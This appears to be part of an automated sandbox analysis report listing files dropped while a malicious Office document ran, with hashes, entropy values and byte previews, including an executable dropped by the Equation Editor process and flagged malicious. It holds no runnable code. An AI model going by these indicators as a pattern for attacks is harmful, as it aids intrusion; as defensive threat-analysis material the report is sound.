SHA-512:	C131D28730899A0D3DF74BA222640B510FC9B263812F5D120211BC9B43CFD00F70B139F99B0E8FB7A23420392CD3F358BFF1C947D964B5F7A96526660D8963B0
Malicious:	false
Reputation:	unknown
Preview:	2023/05/16-12:56:03.790 3320 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/05/16-12:56:03.800 3320 Recovering log #3.2023/05/16-12:56:03.809 3320 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF7385a5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.174745305886461
Encrypted:	false
SSDEEP:	6:kC9VWGq2PP2nKuAl9OmbnIFUtv9VWPZmwd9VWYsW/zkwOP2nKuAl9OmbjLJ:kC3WGvWHAahFUtv3WP/d3WY757HAaSJ
MD5:	784CA2F1554DB57858B79C4C07C07044
SHA1:	27F039CAE5F2FF1D37E9078EE8EFD826247A545E
SHA-256:	DAF8FC7D04A0C613343EC26E90AAF553803F0C0C50FFF097CDFE810C8A58A9E5
SHA-512:	C131D28730899A0D3DF74BA222640B510FC9B263812F5D120211BC9B43CFD00F70B139F99B0E8FB7A23420392CD3F358BFF1C947D964B5F7A96526660D8963B0
Malicious:	false
Reputation:	unknown
Preview:	2023/05/16-12:56:03.790 3320 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/05/16-12:56:03.800 3320 Recovering log #3.2023/05/16-12:56:03.809 3320 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.008898238653846898
Encrypted:	false
SSDEEP:	3:ImtVnM1xVlt/rt/l3Sxdlt4dV1gt/lop:IiV0xlzaxdX4m1lo
MD5:	3B8BF2F369CA7ABDF0636EE15DDEF161
SHA1:	4B82D483B79B555C62AA17F31F24F43C38F2C80F
SHA-256:	100201408FDCFA835C8699C6C2FCE748C5C3844C386053F9AA7CAD622373BFCA
SHA-512:	457D92EA15FA528E7BE3ED8136A267BD08A4D7866FDD7C353CFEB898F896983B40BB48156DC25D5E00EC118C6309337F3A9344226D1635F94D7F4A122D3DD87E
Malicious:	false
Reputation:	unknown
Preview:	VLnk.....?......LhXJ ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite 3.x database, last written using SQLite version 3024000, file counter 15, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 15
Category:	dropped
Size (bytes):	61440
Entropy (8bit):	3.575855668477533
Encrypted:	false
SSDEEP:	384:neh9dThWtELJ8DAcLKuZsLRGlKhsvXh+vSc:bAeZsLQhUSc
MD5:	7E22A002560F0DD050A984FB36A0386A
SHA1:	625591BFDA0533ACD317BB6CB13F1E0B814B6449
SHA-256:	9AB7E4A9526C775C4BB139D35372F9E8CB29B6D009CEDC96C97C630137E90D7C
SHA-512:	5951A7D08EBEF6192314EB0894AEBEE68516A5FF70079D8FA688212158412EE6B74C52C38E99B431597592A91FD9BA7F24139F9B34DE53FAF6E3AC6F9156B71F
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	3.3082741275702126
Encrypted:	false
SSDEEP:	96:7tCm6rZJCpJUhjJoCPCd49IVXEBodRBkh:7b6ACedRBm
MD5:	A768CBA6350488141870BB3835AC4581
SHA1:	0228F80D82C5406824B292280089BAB801294578
SHA-256:	E7E71A36F3DE98D1B01FA2D2D47418136DD33D1C47D20008EBCF18C5FA2714A3
SHA-512:	0770BAC2159BCA311A96D0BB407D94B8EAEA8BCCC5EAF26BC41594EC0A8F91B1C903664FD3457C389B3CBD354454544128C38F3E9787A47495EF500D6DEFAECA
Malicious:	false
Reputation:	unknown
Preview:	.... .c.....G.o...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....X.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

Download File

Process:	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
File Type:	data
Category:	dropped
Size (bytes):	447906
Entropy (8bit):	2.10077509691019
Encrypted:	false
SSDEEP:	1536:nDNTBeJFFFFFFp6TDyWnkCoGgpPortpyxxxxxxVzS:ndDyiPoGgpP
MD5:	CBC0E845C868369D680501F75A1FE43A
SHA1:	621E06A8CCC43BB5E997EDB8CE178854523B6BE1
SHA-256:	4D8D674C9BC568033F84A27C91E1F405C61E787088743FDA58176BC40A813C1D
SHA-512:	A48B19ADABF94BB705508AB2E6212A99F0B70B3DCDB984E0C89B872234E138BB8E45FA8AF3EAEF8CBA97822F6997D5475808E7B236A71A05595A91C70EA93B04
Malicious:	false
Reputation:	unknown
Preview:	Adobe Acrobat Reader DC 19.0....?A12_FindInDocument.............................................................................................................................................ppp.ppp`ppp.ppp.ppp.ppp.ppppppp ............................................................ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp ............................................ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp.ppp0........................................ppp.ppp.ppp.ppp.pppP................ppp0ppp.ppp.ppp.ppp.ppp0................................ppp.ppp.ppp.ppp.ppp.............................ppp`ppp.ppp.ppp.............................ppp.ppp.ppp.ppp.ppp.....................................ppp.ppp.ppp.ppp`........................ppp`ppp.ppp.pppP........................................ppp.ppp.ppp.ppp.........................ppp.ppp.ppp.........ppp.............ppp.........ppp.........ppp.ppp.ppp.........................ppp.ppp.ppp.....ppp0ppp.ppp`....ppp`ppp.ppp0ppp.ppp.ppp.....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1014136
Entropy (8bit):	6.269492701769548
Encrypted:	false
SSDEEP:	12288:yoHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD:yo0odC3lMHiEptXW+xVW8MeH
MD5:	BC8DFCB4093F0BB356E3103AF15F3D1B
SHA1:	25EC668FBF84DB1B01FA623382DA77FD53138833
SHA-256:	7F016599BC5B598D9BA9F8E869A36E0C128BC6BBCCFFB391B05993B62CA71BAA
SHA-512:	16EBDBA2C60D11EFF09BEE5CF1DFCD4D9C726952185766B9497A8F177F239CAE2EDF90F629A3FF51E2AC88B6E7E7300D43359074A906F7D282B4B28465CDF79D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....qbd.................p...................................................................................................l..P.......H............`..x............................................................................................text....c.......p.................. ..`.data....$..........................@....rsrc...H...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A36D4.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	3.239134455125287
Encrypted:	false
SSDEEP:	6144:99gIIfsbfFxFPeEKGdbpnBPHb0Ag4UZsj4JIgt+2jFVWPF/VX4EDLVbzPy:zgII6xdbPDUPuTVzK
MD5:	5E8ED0D57C75A0E4450AD23A47C3FDB9
SHA1:	5E10CCDFE1499536D46DDAB138EC0CBF76BBA17F
SHA-256:	4AF04F720B31132D93DCB31A0C803EF18E288BAAC4F44ACC79CE8442FA49EEA4
SHA-512:	16A87829DE763411F597CBE8FB6D9E7FD48D01BFCA750830886F83EA7C364FA025F0A2A7A7BDBE4BF4AAC12322DA75126C05A1C8A7B79676C3A6A58A5EFF3FC0
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J............................................I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..H..H..I..H..H..K..K..K..K..L..L..I..I..H..H..F..F..J..J..G..G..I..I..J..J..G..G..E..L..L..G..G..M..M..E..E..O..O..L..L..L..L..F..F..K..K..J..J..I..I..H..K..K..H..H..J..J..J..J..D..D..E..E..E..E..H..H..F..F..I..I..F..F..C..C..K..J..J..H..H..G..G..G..G..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\53B708BC.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1106864
Entropy (8bit):	2.142049381005198
Encrypted:	false
SSDEEP:	3072:q7aN3JkKXiDPcp5jw7lPwsVb7ooxv+7/jJK:qaFJkKXiDU7w7lYav+7VK
MD5:	A8EE731C195C2F90DB6B0F3ED0206EC4
SHA1:	A7EC9E659E6FABB8BBD08528F77029597E644811
SHA-256:	1F3CFD953EAFEA5F6B8E9CFF816ED1AE6D80E71F6D4869D4A9B32BB166717C30
SHA-512:	84DEF9F6316848743E51102B3094853E1D2CE153D55FED429C5C0C346EBDF34F307C18D66F2AFA2B75EEAAD2F8AC4BE1AD69452EF13C96931171DB17C2AFB392
Malicious:	false
Reputation:	unknown
Preview:	....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................y$........f.y.@..%...............(.......RQ.z(... ...............$Q.z(... ... ...Id.y ...(... ............d.y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X... ...T.............udv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F...........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5ABBC802.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1106864
Entropy (8bit):	2.142049381005198
Encrypted:	false
SSDEEP:	3072:q7aN3JkKXiDPcp5jw7lPwsVb7ooxv+7/jJK:qaFJkKXiDU7w7lYav+7VK
MD5:	A8EE731C195C2F90DB6B0F3ED0206EC4
SHA1:	A7EC9E659E6FABB8BBD08528F77029597E644811
SHA-256:	1F3CFD953EAFEA5F6B8E9CFF816ED1AE6D80E71F6D4869D4A9B32BB166717C30
SHA-512:	84DEF9F6316848743E51102B3094853E1D2CE153D55FED429C5C0C346EBDF34F307C18D66F2AFA2B75EEAAD2F8AC4BE1AD69452EF13C96931171DB17C2AFB392
Malicious:	false
Reputation:	unknown
Preview:	....l...............C...........m>..?$.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................y$........f.y.@..%...............(.......RQ.z(... ...............$Q.z(... ... ...Id.y ...(... ............d.y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...............X... ...T.............udv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@....C.......L.......................P... ...6...F...........EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E2140C5.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1454420
Entropy (8bit):	0.4385570761089145
Encrypted:	false
SSDEEP:	1536:nZboyiCPthMEGXlCyyow0O8hehsLk8ot3tb2tw:nqEhMPwh/hsLEatw
MD5:	80790DC6AB03E5027E6414ACF5C5B37E
SHA1:	72BE2211533DE9D63EED3E6671F9544FC81B9B74
SHA-256:	5BB6F74DD2F84903B0629F3D5DC31A1E2730F991F92E03421A5A28CA70B5A113
SHA-512:	13A6C3DE9E3C8D5791438A96E36A80060C4CE0AAFDC585F322512AAF007EB970DE8C72DA57D2B4EA6861B2A4A7FCEC761046F0245BAAFA74ED5F2FC405F01F46
Malicious:	false
Reputation:	unknown
Preview:	....l...........c...................7.. EMF....T1..........................8...X....................?..............................................7..........d.......Q....0..........c.......................d.......P...(...x... 0...... ....*...7..(...d............... 0..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5FE4B85F.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.0125563822616974
Encrypted:	false
SSDEEP:	768:v2CnnHbNB0IzJg3ittG70X8cwXqmZPYBIrpCupi8y0V3IruRBPnfmb6qJ+:vvnnHbN/zJUitA70XynCIlN1dfmb6qJ+
MD5:	FDEBFD1C0D731BF56A398ABEB7F221A5
SHA1:	7864F45CA62BC727A332DED751442B99265E065F
SHA-256:	19B8C1D2BFFB4FEAC1BDEB2FB14D79AC6D50B4CEB566C1F3C8E233A088C30EB2
SHA-512:	5747FD24D92139F6CFEC2EE7832AB44AF1DAEE3B1EEDB98FEC07E521E69A769AB1EEBCC91FEB94FE0292835BD32C034ECA545B7422E75FB67D3C3653AE76D83E
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6563E48A.jpeg

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=1], baseline, precision 8, 965x543, components 3
Category:	dropped
Size (bytes):	55370
Entropy (8bit):	7.732446166360939
Encrypted:	false
SSDEEP:	1536:93PFta9L335kzeMRXBPf0xWIqVDPcp5jxOPlFkYsm:97aN3JkKXiDPcp5jwx
MD5:	990581CD06C4532D60580D7F639AAB73
SHA1:	232AA2CB41DCB013058ED1E9459C150C426D6F79
SHA-256:	AD06EF9115ED9A270D1DF4FF8F44D1F8FE68CE7538D70D5663EDF37CA778D8B5
SHA-512:	FFF5C8872C4FC05D2A3B593917AEE6243C8DA483CB47DBF1F7FFE3E313648E4248C8811F6A0D381D2A73F6D0DEB322067C3BBDD443FEC6EF32D7E9B24C062E90
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....NExif..MM........i............................................................,Photoshop 3.0.8BIM.%..................B~...C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6838E1B1.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.0125563822616974
Encrypted:	false
SSDEEP:	768:v2CnnHbNB0IzJg3ittG70X8cwXqmZPYBIrpCupi8y0V3IruRBPnfmb6qJ+:vvnnHbN/zJUitA70XynCIlN1dfmb6qJ+
MD5:	FDEBFD1C0D731BF56A398ABEB7F221A5
SHA1:	7864F45CA62BC727A332DED751442B99265E065F
SHA-256:	19B8C1D2BFFB4FEAC1BDEB2FB14D79AC6D50B4CEB566C1F3C8E233A088C30EB2
SHA-512:	5747FD24D92139F6CFEC2EE7832AB44AF1DAEE3B1EEDB98FEC07E521E69A769AB1EEBCC91FEB94FE0292835BD32C034ECA545B7422E75FB67D3C3653AE76D83E
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8479FFE7.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1454420
Entropy (8bit):	0.4385570761089145
Encrypted:	false
SSDEEP:	1536:nZboyiCPthMEGXlCyyow0O8hehsLk8ot3tb2tw:nqEhMPwh/hsLEatw
MD5:	80790DC6AB03E5027E6414ACF5C5B37E
SHA1:	72BE2211533DE9D63EED3E6671F9544FC81B9B74
SHA-256:	5BB6F74DD2F84903B0629F3D5DC31A1E2730F991F92E03421A5A28CA70B5A113
SHA-512:	13A6C3DE9E3C8D5791438A96E36A80060C4CE0AAFDC585F322512AAF007EB970DE8C72DA57D2B4EA6861B2A4A7FCEC761046F0245BAAFA74ED5F2FC405F01F46
Malicious:	false
Reputation:	unknown
Preview:	....l...........c...................7.. EMF....T1..........................8...X....................?..............................................7..........d.......Q....0..........c.......................d.......P...(...x... 0...... ....*...7..(...d............... 0..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A23056.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.6155527011327502
Encrypted:	false
SSDEEP:	6144:wcPrQYbUBuw3GtjbMfBMb8uK8Aj7jrKr05yKt2goU3eAPln6G0rnYErPSJjVv85s:5gd3Z5yKqAzExup+P6o2n
MD5:	6133D46413B5030EF0CC491BD686580C
SHA1:	AACC826C0DC3084947F553029B2A5BEE8F022F94
SHA-256:	31775E2B4C5E077B7CC2367813E2CBE804EAEED9C332CE918AF8D77C645E6C52
SHA-512:	760A2EEFD8BEB43AEA842F290E6C096D36E8BA9C0F38CD17FED82D0E7662384B569AB01FEF8580FA7538C70AAE9927165ECD33784D5B56D0659DD9F065139A7D
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CECA596B.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.0938355129449302
Encrypted:	false
SSDEEP:	1536:oNE1o7pl8hznbCOnHutN49tJlFA9k/6oHfB0KlN1dfmb6qR1F:vs8hzjtBA9kVHf1lN1dfmb6qR1F
MD5:	5C65827565E89D5357D6F81294701C19
SHA1:	600AA1899BDC58D12671774E84033366DC931C04
SHA-256:	DEC6F35CEB48260F3BA4E6487C48D3F97B274F2EFF29CAB00C2C7E677EEF4B4F
SHA-512:	052C177C606D30F4F3B658F60BB3643FFFEC498CC8FA931B4380AA6B93AC20FA9EF4600645740E99BA2F6D43E333FE783378D14395132819D6FB44787AAD196A
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB5A2C70.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.6155527011327502
Encrypted:	false
SSDEEP:	6144:wcPrQYbUBuw3GtjbMfBMb8uK8Aj7jrKr05yKt2goU3eAPln6G0rnYErPSJjVv85s:5gd3Z5yKqAzExup+P6o2n
MD5:	6133D46413B5030EF0CC491BD686580C
SHA1:	AACC826C0DC3084947F553029B2A5BEE8F022F94
SHA-256:	31775E2B4C5E077B7CC2367813E2CBE804EAEED9C332CE918AF8D77C645E6C52
SHA-512:	760A2EEFD8BEB43AEA842F290E6C096D36E8BA9C0F38CD17FED82D0E7662384B569AB01FEF8580FA7538C70AAE9927165ECD33784D5B56D0659DD9F065139A7D
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DDCC6969.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	1.0938355129449302
Encrypted:	false
SSDEEP:	1536:oNE1o7pl8hznbCOnHutN49tJlFA9k/6oHfB0KlN1dfmb6qR1F:vs8hzjtBA9kVHf1lN1dfmb6qR1F
MD5:	5C65827565E89D5357D6F81294701C19
SHA1:	600AA1899BDC58D12671774E84033366DC931C04
SHA-256:	DEC6F35CEB48260F3BA4E6487C48D3F97B274F2EFF29CAB00C2C7E677EEF4B4F
SHA-512:	052C177C606D30F4F3B658F60BB3643FFFEC498CC8FA931B4380AA6B93AC20FA9EF4600645740E99BA2F6D43E333FE783378D14395132819D6FB44787AAD196A
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF18FBFE.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1505804
Entropy (8bit):	3.239134455125287
Encrypted:	false
SSDEEP:	6144:99gIIfsbfFxFPeEKGdbpnBPHb0Ag4UZsj4JIgt+2jFVWPF/VX4EDLVbzPy:zgII6xdbPDUPuTVzK
MD5:	5E8ED0D57C75A0E4450AD23A47C3FDB9
SHA1:	5E10CCDFE1499536D46DDAB138EC0CBF76BBA17F
SHA-256:	4AF04F720B31132D93DCB31A0C803EF18E288BAAC4F44ACC79CE8442FA49EEA4
SHA-512:	16A87829DE763411F597CBE8FB6D9E7FD48D01BFCA750830886F83EA7C364FA025F0A2A7A7BDBE4BF4AAC12322DA75126C05A1C8A7B79676C3A6A58A5EFF3FC0
Malicious:	false
Reputation:	unknown
Preview:	....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J............................................I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..I..H..H..I..H..H..K..K..K..K..L..L..I..I..H..H..F..F..J..J..G..G..I..I..J..J..G..G..E..L..L..G..G..M..M..E..E..O..O..L..L..L..L..F..F..K..K..J..J..I..I..H..K..K..H..H..J..J..J..J..D..D..E..E..E..E..H..H..F..F..I..I..F..F..C..C..K..J..J..H..H..G..G..G..G..H..H..H..H..H..H..H..H..H..H..H..H..H..H..H..............................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~$RD0003.docm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.479760646202031
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHoljpl0QelMWFlc2VbiVllln:vdsCkWt51p2tvHV6/l
MD5:	0ACDE4A3C820A366AC6C0AB821A72207
SHA1:	B6551E86B60D095E74D4F79B6B004D40FDA4BA72
SHA-256:	3F3701E84757747159396FB41AD88E0E51084F846EB8007A2FAEAC15CE9DBF2C
SHA-512:	CB974D0C6CFE9B9AF015DD9D92B8110FC9AFE7EEA9A8C03ECF9112F6EA642DBE5FE9531E39B5B52EAADE7FEBAF6C17E4DD92AF5841476BECEA8E8789E19C2FB0
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~$RD0005.docm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.479760646202031
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHoljpl0QelMWFlc2VbiVllln:vdsCkWt51p2tvHV6/l
MD5:	0ACDE4A3C820A366AC6C0AB821A72207
SHA1:	B6551E86B60D095E74D4F79B6B004D40FDA4BA72
SHA-256:	3F3701E84757747159396FB41AD88E0E51084F846EB8007A2FAEAC15CE9DBF2C
SHA-512:	CB974D0C6CFE9B9AF015DD9D92B8110FC9AFE7EEA9A8C03ECF9112F6EA642DBE5FE9531E39B5B52EAADE7FEBAF6C17E4DD92AF5841476BECEA8E8789E19C2FB0
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~$RD0833.docm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.479760646202031
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHoljpl0QelMWFlc2VbiVllln:vdsCkWt51p2tvHV6/l
MD5:	0ACDE4A3C820A366AC6C0AB821A72207
SHA1:	B6551E86B60D095E74D4F79B6B004D40FDA4BA72
SHA-256:	3F3701E84757747159396FB41AD88E0E51084F846EB8007A2FAEAC15CE9DBF2C
SHA-512:	CB974D0C6CFE9B9AF015DD9D92B8110FC9AFE7EEA9A8C03ECF9112F6EA642DBE5FE9531E39B5B52EAADE7FEBAF6C17E4DD92AF5841476BECEA8E8789E19C2FB0
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~$RO0000.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.479760646202031
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHoljpl0QelMWFlc2VbiVllln:vdsCkWt51p2tvHV6/l
MD5:	0ACDE4A3C820A366AC6C0AB821A72207
SHA1:	B6551E86B60D095E74D4F79B6B004D40FDA4BA72
SHA-256:	3F3701E84757747159396FB41AD88E0E51084F846EB8007A2FAEAC15CE9DBF2C
SHA-512:	CB974D0C6CFE9B9AF015DD9D92B8110FC9AFE7EEA9A8C03ECF9112F6EA642DBE5FE9531E39B5B52EAADE7FEBAF6C17E4DD92AF5841476BECEA8E8789E19C2FB0
Malicious:	false
Reputation:	unknown
